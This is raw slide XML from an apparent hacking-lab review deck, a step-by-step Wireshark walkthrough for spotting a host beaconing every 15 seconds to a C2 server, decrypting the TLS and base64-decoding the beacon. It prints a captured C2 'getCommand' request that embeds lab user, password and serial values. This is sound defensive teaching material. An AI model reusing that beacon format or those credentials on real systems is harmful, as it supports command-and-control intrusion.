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360" r:id="rId2"/>
    <p:sldId id="364" r:id="rId3"/>
    <p:sldId id="386" r:id="rId4"/>
    <p:sldId id="391" r:id="rId5"/>
    <p:sldId id="392" r:id="rId6"/>
    <p:sldId id="393" r:id="rId7"/>
    <p:sldId id="394" r:id="rId8"/>
    <p:sldId id="395" r:id="rId9"/>
    <p:sldId id="3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75" d="100"/>
          <a:sy n="75" d="100"/>
        </p:scale>
        <p:origin x="162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B53A-E2A1-4BBA-B278-9B65E8B0BA1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D6C6-3C82-4703-B15C-41345024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7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7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4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96FF-33D8-4524-BFF0-E5E5F392E3F1}" type="datetimeFigureOut">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>10/5/2022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" y="877529"/>
            <a:ext cx="9141241" cy="51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8" b="48593"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="5687962"/>
            <a:ext cx="9144000" cy="117003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96409" y="322155"/>
            <a:ext cx="1838600" cy="883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00599"/>
            <a:ext cx="9144000" cy="19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Hacking-Lab</a:t>
            </a:r>
          </a:p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Reviews</a:t>
            </a:r>
            <a:endParaRPr lang="ja-JP" altLang="en-US" sz="60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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b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4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415845"/>
            <a:ext cx="9144000" cy="544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A2 Wireshark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traffic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Resources, download the zip file containing the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recording.pcap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apache.pem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files. Open the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using Wireshark.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct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number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command being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C2 server? (you will need to do some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b="1" u="sng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</a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="-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DC47C8-ED11-9996-4E45-E86D4913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0647"/>
            <a:ext cx="9144000" cy="346192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F02FD69-CFC2-8C1A-8D8F-B5EFB5670090}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1292902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Step 1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Find the suspicious outgoing traffic that triggers almost every 15 sec.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Since every initial connections require a 3-way handshake, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pcap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SYN flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG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SG" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You will see many connections made. You will notice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.200.44</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is of interest, because it is making </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>many outgoing connections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a: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SG" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In particular, you notice that it made many outgoing connections to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.100.66</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="18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By looking at the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Time column</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, you can sense that a connection is almost made </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>every 15 sec.</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="タイトル 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D049B76-7A51-5102-C476-307D5790BC2C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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b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902D8D-05C4-9F08-EF9E-976FBC176F9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1286256" y="4229835"/>
            <a:ext cx="1066800" cy="84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602B6A-1ACD-42E2-9259-3A774A324EA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523240" y="4229835"/>
            <a:ext cx="604520" cy="84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303C64-2311-2C28-9DEB-868FA2755899}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="78740" y="3920448"/>
            <a:ext cx="1856740" cy="177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4E66DD-7049-D627-D7D5-09E85C3F9857}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5696204" y="4229834"/>
            <a:ext cx="314452" cy="84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F84451-B514-3FD0-4C51-3455CC0BC1C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="159422" y="5311326"/>
            <a:ext cx="8807793" cy="480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498AB0-1010-6A8C-EE44-08EDFE7FAE1E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5853430" y="3323152"/>
            <a:ext cx="53315" cy="906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575B3C-E29C-A849-0BFF-C891437FAC73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2332071" y="3048502"/>
            <a:ext cx="165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Source &amp; Destination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411B7D-B512-B42C-B73E-4BAE09850B2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5584516" y="3061542"/>
            <a:ext cx="644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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syn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11EF3C-4ECC-30F2-9896-E5A4138C7B4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161602" y="3310112"/>
            <a:ext cx="317932" cy="897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EB6E8B-3B54-7285-A9F5-B1AD5B0512C3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 flipH="1">
            <a:off x="1819656" y="3310112"/>
            <a:ext cx="1341946" cy="919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8275FFD-4E90-2BC0-7D19-08BA1AB51F90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3075476" y="4233900"/>
            <a:ext cx="915657" cy="84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95089A-C67F-3175-771B-7955977748E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="336505" y="3034872"/>
            <a:ext cx="165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B3F3B8-BE73-0B74-CCBB-4236B7FA2EF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="63" idx="2"/>
            <a:endCxn id="41" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="825500" y="3296482"/>
            <a:ext cx="340536" cy="93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531BF6-6F7D-8A07-3BBD-78CDD0A90E92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3964320" y="2919492"/>
            <a:ext cx="1659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This is just other random traffic for you to filter out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9E840A-A093-BAFC-5D26-7E6D811E08BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="67" idx="2"/>
            <a:endCxn id="48" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4563319" y="3350379"/>
            <a:ext cx="230532" cy="1960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5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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D049B76-7A51-5102-C476-307D5790BC2C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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b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6E20F-7627-AD00-09DF-81C1C3C4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4668"/>
            <a:ext cx="9144000" cy="36243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0303C64-2311-2C28-9DEB-868FA2755899}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="78740" y="3744207"/>
            <a:ext cx="1856740" cy="177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52E46D-D4B0-6413-100F-0124CDB60E56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3104303" y="4079748"/>
            <a:ext cx="919057" cy="2769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C0CEB-1F9C-2B02-3F39-48D4186AB045}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4321556" y="4353806"/>
            <a:ext cx="445516" cy="585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2ADCB0-3D7E-E1E2-85F4-EAED785CEF47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4897884" y="4646545"/>
            <a:ext cx="1399284" cy="15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BB4FE-6335-7320-E35A-E3187CBD179F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1292902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Step 2:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Now, you know that destination </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.100.66</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is likely a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C2 server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pcap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.100.66</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG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SG" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You will notice the communication is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>encrypted using TLS. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is of interest, because it is making </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>many outgoing connections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a: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SG" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You notice that there </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is Application Data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. This is of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>concern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG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Let’s narrow only to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>packet 5 – 22</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, where there is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>complete transaction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. The rest are just being repeated every 15 sec.</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" sz="1800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9450-1063-89EF-56D6-6366C363ED85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="294640" y="4031373"/>
            <a:ext cx="213360" cy="1333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24F27D-878A-9374-8600-54ED35C739A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:endCxn id="19" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="401320" y="2946400"/>
            <a:ext cx="2778760" cy="1084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7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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D049B76-7A51-5102-C476-307D5790BC2C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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b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BB4FE-6335-7320-E35A-E3187CBD179F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="129290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Step 3:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Now you know that the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>communication is encrypted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and that there is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>application data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>involved, use the given </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>key to decrypt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to see what’s in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95EA0-00C1-F2CB-237D-5B4F24B8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652"/>
            <a:ext cx="9144000" cy="45433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2197E8-665D-D41A-D5D7-B66440666E62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2789499" y="1840375"/>
            <a:ext cx="833377" cy="2291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BBFC92-9FB0-49D5-5670-37C28EA73541}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1958341" y="4132161"/>
            <a:ext cx="5947168" cy="25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96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9E535-3635-527C-7658-349A8853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810"/>
            <a:ext cx="9144000" cy="1668576"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="タイトル 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D049B76-7A51-5102-C476-307D5790BC2C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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b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BB4FE-6335-7320-E35A-E3187CBD179F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1292902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Step 4:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Now that the communication is decrypted, you notice that the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Application Data in packet 13 is now in clear-text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. 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You notice that the client 192.168.200.44 is getting some data via PHP from the C2 server 192.168.100.66. However, it seems that the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data is encoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> by a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>random string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Since </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is the easiest to decode, let’s copy the random string and decode using an online decoder.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sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Random String (is between the =): </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Z2V0Q29tbWFuZD10cnVlJnVzZXI9V3hUckZrJnBhc3M9c2VjdXJlJnNlcmlhbD13eHBVSUQzMzEyNTUyMw</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-SG" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-SG" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-SG" sz="18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2197E8-665D-D41A-D5D7-B66440666E6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966451" y="1905877"/>
            <a:ext cx="1924829" cy="4017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BBFC92-9FB0-49D5-5670-37C28EA73541}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3891280" y="5852161"/>
            <a:ext cx="5229860" cy="14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F063F-9474-A1E4-9ABC-F79EF15A6CCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="5388865"/>
            <a:ext cx="176784" cy="1010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DD97033-77E8-50CF-5476-E718D42A8605}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5795522" y="3169162"/>
            <a:ext cx="1739695" cy="3768542"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8922"/>
              <a:gd name="adj2" fmla="val 7773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6ED9D5-6BFF-65BB-5604-14D4D1D3E2B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499123" y="2979174"/>
            <a:ext cx="1211603" cy="120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6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957C7D-355A-E222-EDE8-D9421C09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098"/>
            <a:ext cx="7187381" cy="4042902"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="タイトル 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D049B76-7A51-5102-C476-307D5790BC2C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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b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BB4FE-6335-7320-E35A-E3187CBD179F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1292902"/>
            <a:ext cx="9144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Step 5:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Copy the random string as “Printable Text”. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You will need to remove anything before the “==“ and after the “=“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Random String: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" sz="1400" strike="sngStrike" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1400" strike="sngStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gc.php?r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1400" strike="sngStrike" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Z2V0Q29tbWFuZD10cnVlJnVzZXI9V3hUckZrJnBhc3M9c2VjdXJlJnNlcmlhbD13eHBVSUQzMzEyNTUyMw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1400" strike="sngStrike" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>== HTTP/1.1 User-Agent: curl/7.22.0 (i386-pc-win32) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1400" strike="sngStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>libcurl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1400" strike="sngStrike" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
